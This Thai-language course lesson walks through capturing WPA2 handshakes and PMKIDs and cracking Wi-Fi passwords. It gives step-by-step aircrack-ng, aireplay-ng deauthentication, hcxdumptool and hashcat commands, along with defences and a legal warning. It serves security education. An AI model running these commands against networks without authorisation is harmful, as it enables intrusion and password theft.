การดักจับและถอดรหัส WPA2 Handshake
ดักจับแฮนด์เชก 4 ขั้นตอนด้วย aircrack-ng และทดลองโจมตีด้วยพจนานุกรมผ่าน Hashcat
การดักจับและถอดรหัส WPA2 Handshake เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
กระบวนการจับมือ 4 ขั้นตอน
เมื่อไคลเอ็นต์เชื่อมต่อกับเครือข่าย WPA2 กระบวนการจับมือ 4 ขั้นตอนจะสร้างคีย์ชั่วคราวแบบคู่ (PTK) จาก PMK (ซึ่งสร้างมาจาก PSK) และค่าที่ใช้ครั้งเดียวแบบสุ่ม การดักจับกระบวนการจับมือนี้ทำให้สามารถถอดรหัสผ่านโดยไม่เชื่อมต่อเครือข่ายได้
การตั้งค่าโหมดตรวจสอบ
โหมดตรวจสอบช่วยให้การ์ดไร้สายดักจับเฟรมทั้งหมดได้โดยไม่คำนึงถึงปลายทาง ซึ่งจำเป็นสำหรับการดักจับกระบวนการจับมือแบบไม่โต้ตอบ และใช้งานได้เฉพาะกับการ์ดที่รองรับโหมดตรวจสอบเท่านั้น
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killการดักจับกระบวนการจับมือแบบไม่โต้ตอบ
Airodump-ng ดักจับเฟรมโดยไม่ส่งข้อมูลออกไป ให้รอไคลเอ็นต์เชื่อมต่อตามปกติ หรือบังคับให้เชื่อมต่อใหม่ด้วยการยกเลิกการรับรองความถูกต้อง ผลการดักจับกระบวนการจับมือจะแสดงที่มุมขวาบนของผลลัพธ์จาก airodump
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...การโจมตีด้วยการยกเลิกการรับรองความถูกต้อง
การส่งเฟรมยกเลิกการรับรองความถูกต้องปลอมจะบังคับให้ไคลเอ็นต์ที่เชื่อมต่ออยู่ยกเลิกการเชื่อมต่อและเชื่อมต่อใหม่ ทำให้เกิดการดักจับกระบวนการจับมือครั้งใหม่ การโจมตีนี้มีสัญญาณรบกวนสูง ตรวจจับได้ และไคลเอ็นต์ต้องอยู่ในระยะ
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)การโจมตีด้วย PMKID: ไม่ต้องมีไคลเอ็นต์
การโจมตีด้วย PMKID (hcxdumptool) ดักจับ PMKID จากเฟรมประกาศหรือเฟรมตรวจหา โดยไม่จำเป็นต้องมีไคลเอ็นต์ที่เชื่อมต่ออยู่ ทำให้ได้ข้อมูลเร็วกว่า และสามารถถอดรหัสได้ง่ายพอ ๆ กับกระบวนการจับมือแบบเต็ม
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtการถอดรหัสกระบวนการจับมือด้วย Hashcat
แปลงไฟล์การดักจับ แล้วโจมตีด้วย Hashcat โหมด 22000 (รูปแบบรวมของ WPA2) หรือโหมด 2500 (รูปแบบเดิม) ใช้ rockyou.txt ร่วมกับชุดกฎเพื่อให้ได้ผลลัพธ์ที่ดีที่สุด
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dการถอดรหัสด้วย Aircrack-ng
Aircrack-ng ถอดรหัส WPA2 โดยใช้ CPU โดยตรงจากไฟล์การดักจับ ทำงานช้ากว่าการถอดรหัสด้วย GPU ของ Hashcat แต่ไม่ต้องแปลงรูปแบบ
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capกลยุทธ์การใช้รายการคำศัพท์
ความสำเร็จในการถอดรหัสผ่าน WPA2 ขึ้นอยู่กับคุณภาพของรายการคำศัพท์ทั้งหมด ให้ใช้ rockyou.txt เป็นพื้นฐาน ชุดกฎของ Hashcat สำหรับการดัดแปลง รายการคำศัพท์เฉพาะบริษัท (ชื่อ+ปี+สัญลักษณ์) และรายการเป้าหมายจาก OSINT
ความเป็นจริงของเวลาในการถอดรหัส
รหัสผ่าน WPA2 แบบสุ่มที่มีความยาวตั้งแต่ 20 อักขระขึ้นไปไม่สามารถถอดรหัสได้ในทางปฏิบัติด้วยกำลังคำนวณ การถอดรหัสจะทำได้จริงเฉพาะกับรหัสผ่านสั้นหรือรหัสผ่านที่อิงจากรายการคำศัพท์เท่านั้น นี่คือเหตุผลที่ความยาวและความสุ่มของรหัสผ่านสำคัญกว่ากฎด้านความซับซ้อน
การป้องกัน
ใช้ WPA3-SAE ซึ่งป้องกันการโจมตีด้วยรายการคำศัพท์โดยไม่เชื่อมต่อเครือข่าย หรือใช้ WPA2 ที่มีวลีรหัสผ่านแบบสุ่มยาวตั้งแต่ 20 อักขระขึ้นไป และใช้ WPA2-Enterprise กับ EAP-TLS ซึ่งใช้ใบรับรองแทนรหัสผ่าน
ข้อเตือนใจด้านกฎหมาย
การดักจับกระบวนการจับมือ WPA2 บนเครือข่ายที่คุณไม่ได้เป็นเจ้าของถือว่าผิดกฎหมาย เทคนิคทั้งหมดในบทนี้ใช้ได้เฉพาะกับเครือข่ายทดสอบของคุณเองหรือสภาพแวดล้อมห้องปฏิบัติการที่ได้รับอนุญาตเท่านั้น เช่น ห้องทดลองที่บ้านหรือ AP ทดสอบที่จัดไว้โดยเฉพาะ
ตรวจสอบอย่างรวดเร็ว
การโจมตีด้วย PMKID ช่วยปรับปรุงอะไรเมื่อเทียบกับการดักจับกระบวนการจับมือแบบมาตรฐาน
สรุป: การถอดรหัส WPA2
การดักจับกระบวนการจับมือ WPA2 หรือ PMKID เปลี่ยนการถอดรหัส WiFi ให้เป็นการโจมตีด้วยรายการคำศัพท์โดยไม่เชื่อมต่อเครือข่าย ความสำเร็จขึ้นอยู่กับความแข็งแกร่งของรหัสผ่านทั้งหมด รหัสผ่านสั้นและอิงจากรายการคำศัพท์จะถูกถอดรหัสได้อย่างรวดเร็ว ส่วนรหัสผ่านแบบสุ่มที่ยาวจะถอดรหัสไม่ได้ในทางปฏิบัติ ให้ป้องกันด้วย WPA3-SAE วลีรหัสผ่านที่แข็งแกร่ง และ WPA2-Enterprise สำหรับเครือข่ายองค์กร
เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี
เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป
- คอร์ส
- 76
- บทเรียน
- 303
คำถามที่พบบ่อย
บทเรียน “การดักจับและถอดรหัส WPA2 Handshake” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “การดักจับและถอดรหัส WPA2 Handshake” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “การดักจับและถอดรหัส WPA2 Handshake”
ดักจับแฮนด์เชก 4 ขั้นตอนด้วย aircrack-ng และทดลองโจมตีด้วยพจนานุกรมผ่าน Hashcat คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน
บทเรียน “การดักจับและถอดรหัส WPA2 Handshake” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- โพรโทคอลความปลอดภัย 802.11: WEP, WPA2 และ WPA3
- การดักจับและถอดรหัส WPA2 Handshake
- การโจมตี Evil Twin และ Captive Portal
- Wi-Fi ระดับองค์กร: EAP และ RADIUS